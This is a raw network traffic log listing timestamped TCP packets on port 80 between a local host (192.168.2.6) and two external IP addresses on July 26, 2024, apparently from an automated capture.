Jul 26, 2024 12:57:50.122090101 CEST	60839	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:50.122297049 CEST	60839	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:50.122626066 CEST	80	60838	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:50.122673988 CEST	60838	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:50.127933025 CEST	80	60839	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:50.152509928 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.152559042 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.152563095 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.152575016 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.152604103 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.152690887 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.152705908 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.152721882 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.152730942 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.152753115 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.152764082 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.152893066 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.152936935 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.192323923 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.192373037 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.192373037 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.192395926 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.192410946 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.192425013 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.192691088 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.192712069 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.192734003 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.192743063 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.192745924 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.192766905 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.192780018 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.192783117 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.192797899 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.192806005 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.192814112 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.192822933 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.192836046 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.192848921 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.193030119 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.193063974 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.193073988 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.193080902 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.193094969 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.193110943 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.193115950 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.193115950 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.193125963 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.193145037 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.193209887 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.193224907 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.193248034 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.193259001 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.193259954 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.193275928 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.193289995 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.193296909 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.193305969 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.193308115 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.193320990 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.193325996 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.193337917 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.193342924 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.193351030 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.193352938 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.193373919 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.193386078 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.194088936 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.194103003 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.194125891 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.194130898 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.194138050 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.194149971 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.194154024 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.194186926 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.194186926 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.194202900 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.194219112 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.194241047 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.194263935 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.194341898 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.194381952 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.194421053 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.194436073 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.194449902 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.194458961 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.194474936 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.194488049 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.195357084 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.195399046 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.195420027 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.195436954 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.195457935 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.195466042 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.195548058 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.195564985 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.195579052 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.195585012 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.195596933 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.195615053 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.195765018 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.195780039 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.195795059 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.195805073 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.195810080 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.195822954 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.195825100 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.195833921 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.195852041 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.195864916 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.196218014 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.196233034 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.196249962 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.196257114 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.196265936 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.196269035 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.196281910 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.196285963 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.196294069 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.196300983 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.196306944 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.196309090 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.196315050 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.196340084 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.196384907 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.196543932 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.196559906 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.196610928 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.196616888 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197173119 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197187901 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197202921 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197217941 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197220087 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197232962 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197232962 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197247982 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197249889 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197257996 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197264910 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197276115 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197280884 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197288036 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197295904 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197305918 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197309971 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197323084 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197324991 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197333097 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197344065 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197350979 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197354078 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197360992 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197384119 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197590113 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197604895 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197622061 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197629929 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197637081 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197647095 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197653055 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197653055 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197666883 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197671890 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197683096 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197689056 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197694063 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197698116 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197714090 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197717905 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197727919 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197730064 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197747946 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197750092 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197762012 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197762012 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197777987 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.197796106 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.197828054 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.198199034 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.198239088 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.198390961 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.198405981 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.198421001 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.198431015 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.198436022 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.198448896 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.198451042 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.198467016 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.198468924 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.198482037 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.198489904 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.198498011 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.198513031 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.198520899 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.198520899 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.198528051 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.198528051 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.198544025 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.198549032 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.198559046 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.198561907 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.198574066 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.198580027 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.198590040 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.198596954 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.198604107 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.198623896 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.199189901 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.199206114 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.199222088 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.199238062 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.199239016 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.199249983 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.199254036 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.199274063 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.199307919 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.249497890 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.249514103 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.249563932 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.249572039 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.249600887 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.249617100 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.249641895 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.249660969 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.249702930 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.249718904 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.249744892 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.249766111 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.249802113 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.249845982 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.288963079 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.288979053 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.288994074 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289007902 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289022923 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289036989 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289052010 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289066076 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289079905 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289093971 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289109945 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289124966 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289139032 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289151907 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289167881 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289177895 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.289181948 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289196968 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289212942 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289247036 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.289263010 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.289460897 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289484024 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289499998 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289515018 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289527893 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.289530993 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289546013 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289554119 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.289561987 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289572954 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.289586067 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289589882 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289593935 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.289598942 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.289633989 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.293576956 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.293613911 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.293628931 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.293629885 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.293643951 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.293668032 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.293767929 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.293785095 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.293814898 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.293828011 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.293875933 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.293891907 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.293920040 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.293934107 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294001102 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294034004 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294045925 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294049025 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294076920 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294089079 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294166088 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294181108 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294194937 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294209003 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294210911 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294229031 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294236898 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294258118 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294305086 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294349909 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294397116 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294411898 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294428110 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294440031 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294444084 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294454098 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294459105 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294470072 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294475079 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294487000 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294504881 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294521093 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294817924 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294832945 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294847965 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294862032 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294862986 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294873953 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294877052 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294891119 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294891119 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294903994 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294905901 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294920921 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294920921 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294935942 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294940948 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294950008 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294954062 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294965982 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.294979095 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.294981003 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.295005083 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.295027971 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.295428038 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.295443058 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.295456886 CEST	80	60836	198.46.178.145	192.168.2.6
